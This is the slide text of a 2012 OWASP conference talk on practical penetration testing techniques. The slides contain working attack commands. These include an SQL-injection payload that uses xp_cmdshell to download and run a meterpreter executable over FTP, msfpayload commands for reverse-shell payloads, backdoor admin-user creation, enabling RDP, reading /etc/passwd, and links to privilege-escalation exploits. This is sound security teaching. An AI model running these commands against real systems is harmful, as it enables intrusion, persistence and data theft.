This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like:
0. How do I prepare? What kind of tools I should have?
1. I need to scan the entire network in a faster way?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable but how can I exploit?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box, compromised it, now what to do?
In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Public exploit held private : Penetration Testing the researcher’s way
1. OWASP InfoSec India Conference 2012
August 24th – 25th, 2012 The OWASP Foundation
Hotel Crowne Plaza, Gurgaon http://www.owasp.org
http://www.owasp.in
Public exploit held private :
Penetration Testing the
researcher’s way
Tamaghna Basu
GCIH, OSCP, RHCE, CEH, ECSA
tamaghna.basu@gmail.com
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
2. DISCLAIMER!
This presentation contains materials on the evolution
of a pen tester which is solely based on the
perspective of the speaker which might contradict
with opinions of individuals.
All the scenarios explained here are fictional even
though they might resemble to realistic situations.
Even though no harm intended, if it causes any
discomfort to you spiritually and/or physically, the
speaker, organizers, hotel authority, climate control
people and the person sitting next to you will not be
responsible for that.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
3. Setting the context
Why Pentesting?
How do you do it?
To VA or to PT… That’s the question.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
4. Setting the context
Terminologies
Vulnerability
Exploit
Payload
Reverse shell
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
5. Basics
Pentesting
Internal
External
Automated -> review the report -> get the
final report
Manual -> run few basic tools -> get the
report done
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
6. Basics…
Pentesting Steps
Recon and Scanning
Exploit
Maintain Access
Clean up
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
7. Scanning
Why?
Identify the live hosts
OS fingerprinting
Service fingerprinting
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
8. Scanning
Desi Jugaad
Ping sweep / shell scripts
Decent tools (But indecent usage)
NMAP (behold the power of NSE)
Others?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
9. Desi Jugaad (Local Hack)
Ping Sweep
Windows
FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“
Linux
#!/bin/bash
for ip in $(seq 1 254); do
ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
done
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
10. Scanning
Problem!
It is taking too long to scan, need to go for
lunch…
Is it really a windows box but looks like a
Linux box? Or which version?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
13. Nmap Scripts
• Shared files and folders
• nmap --script=smb-enum-shares 192.168.80.129
• Check for SMB vulnerabilities
• nmap --script=smb-check-vulns 192.168.80.129
• Scan for machines that use default Ms sql username,password
• nmap --script=ms-sql-info 192.168.80.129
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
14. Scanning
I have Nessus. Why to go through so much
pain?
I don’t have Nessus. What to do?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
15. Exploit
Motive
To gain access
Data
Command execution
Destroy everything!
Categories
Service level
OS
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
16. Exploit
What to exploit?
FTP?
HTTP?
SNMP?
What else?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
17. Exploit
FTP
Server Exploit – Buffer Overflow
Fuzzing???
Bruteforce
SNMP
What to do?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
18. FTP Tips
Windows
echo open 192.168.12.124 > ftp.txt
echo ftp>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo get met2.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
19. FTP Tips
Linux
echo quote user ftp>> ftp.txt
quote user ftp
echo quote pass ftp>>ftp.txt
echo verbose>>ftp.txt
echo binary >> ftp.txt
echo get exploit.c >> ftp.txt
echo bye >> ftp.txt
cat ftp.txt|ftp -n 192.168.12.124
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
20. Exploit
HTTP
Server Exploit
Command Execution
Web Shells
SQLi
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
22. SQLi Tips
' or 1=1;exec master..xp_cmdshell 'echo open
192.168.12.124> ftpmet.txt';exec
master..xp_cmdshell 'echo test>>
ftpmet.txt';exec master..xp_cmdshell 'echo
test>> ftpmet.txt';exec master..xp_cmdshell
'echo bin>> ftpmet.txt';exec
master..xp_cmdshell 'echo get met.exe>>
ftpmet.txt';exec master..xp_cmdshell 'echo
bye';exec master..xp_cmdshell 'ftp -
s:ftpmet.txt';exec master..xp_cmdshell
'met.exe';--
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
23. SQLi Tips
My SQL non-interactive
"mysql --host=127.0.0.1 --user=root --
password=‘password' -e "use mysql; show
tables;"
"mysql --host=127.0.0.1 --user=root --
password=‘password' -e "SELECT
LOAD_FILE('/etc/passwd') INTO dumpfile
'/tmp/passwd';"
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
24. Exploit
Metasploit
Use Exploit
Set payload
exploit
Any other options?
How about writing own exploit (at free time)
(out of scope)
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
25. L33t love story
Exploit’s love letter to the machine
PAYLOAD…
Which courier?
MSF – set payload
Custom program – msfpayload
Bad characters
Executable - msfpayload
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
26. Payload Generator
meterpreter msfpayload
options:
./msfpayload windows/meterpreter/reverse_tcp O
Create exe:
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
Generate shellcode:
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.15 LPORT=4321 C
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
27. From msf:
use exploit/multi/handler
set PAYLOAD
windows/meterpreter/reverse_tcp
set LHOST 192.168.1.40
set LPORT 80
show options
exploit
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
28. Exploit
I am in, what to do?
Secure access?
Add user
Open a port
I like it the reverse way
meterpreter
Dude, did you get root/admin acces?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
29. Add User
Windows Shell
net user hacker hacker123 /add
net localgroup administrators hacker /add
Meterpreter
use incognito
add_user hacker hacker123
add_localgroup_user Administrators hacker
RDP enable reg add
"HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
ControlTerminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
30. Privilege Escalation
Categories
Service level
OS
Problem!
How can I transfer my exploit there?
Netcat
FTP
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
31. Kernel Exploits
Linux Kernel <= 2.6.36-rc8 http://www.exploit-
db.com/exploits/15285/
Linux Kernel 2.4/2.6 http://www.exploit-
db.com/exploits/9545/
Linux Kernel 2.6 http://www.exploit-
db.com/exploits/8478/
Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5
http://www.exploit-db.com/exploits/9844/
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
32. Windows Exploits
Windows Vista, 7, 2008 http://www.exploit-
db.com/exploits/15609/
Windows XP, 2003 http://www.exploit-
db.com/exploits/18176/
Linux + NT priv esc http://www.exploit-
db.com/exploits/9301/
Windows XP SP2, SP3 http://www.exploit-
db.com/exploits/9301/
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
33. Pivoting…
Huh?
Why do I need it?
How do I do it?
nc + port forwarding
Ssh tunneling
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
34. Fuzzing…
My favorite but last thing I prefer to do on
my own
Python rocks!
Basic
Advanced
SEH handler
Egg hunting shellcode
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
35. Did I miss anything?
Questions
Perspectives
Comments
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
36. Thank you
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
36
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)